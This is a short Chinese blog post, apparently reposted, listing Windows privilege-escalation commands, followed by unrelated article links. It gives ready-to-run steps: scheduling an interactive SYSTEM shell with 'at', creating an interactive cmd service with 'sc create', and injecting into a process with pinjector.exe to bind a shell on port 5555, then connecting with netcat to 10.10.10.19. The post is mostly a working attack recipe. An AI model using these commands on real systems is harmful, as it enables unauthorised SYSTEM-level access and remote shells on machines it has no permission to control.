windows提权
本文共 399 字,大约阅读时间需要 1 分钟。
- PsExec
- at
- Process_Injector
-
sc
psexec
当前用户是jh
提权之后
*at命令提权(适用于xp,2003)
at 15:05 /interact cmd
sc
创建服务(打开cmd命令窗口的服务)
sc Create systemcmd binPath= "cmd /K start" type= own type= interact
启动服务刚才创建的服务
sc start systemcmd
process_injector
列出当前的所有进程
pinjector.exe -l
选择要提权成的用户,进行进程注入
pinjector.exe -p 732 cmd 5555 #服务端实现进程注入nc -nv 10.10.10.19 5555 # 客户端连接服务端
转载于:https://blog.51cto.com/13155409/2154920
你可能感兴趣的文章
RabbitMQ 应用二
查看>>
zabbix监控tomcat与安全规范
查看>>
Ubuntu-10.10如何给用户添加sudo权限
查看>>
记录系统日志方法
查看>>
摘自当当网的36类商品分类菜单
查看>>
js判断客户端是pc还是手机
查看>>
cast——java类型转换
查看>>
linux 切换c++版本
查看>>
静态方法和实例方法联系与区别
查看>>
java 正则获取html的值
查看>>
NOI2015
查看>>
Eclipse导入别人项目爆红叉
查看>>
JVM(四、尝试编写类加载器)
查看>>
Extjs 4.2使用心得 --- store和reader使用技巧
查看>>
文本框 只能输入数字和小数点验证
查看>>
HIbernate学习笔记(八) hibernate缓存机制
查看>>
struts2从浅至深(三)拦截器
查看>>
Eclipse 项目run时 Console控制台输出中文乱码问题的解决方法
查看>>
Alpha冲刺随笔集
查看>>
小米6.0运行时权限填坑
查看>>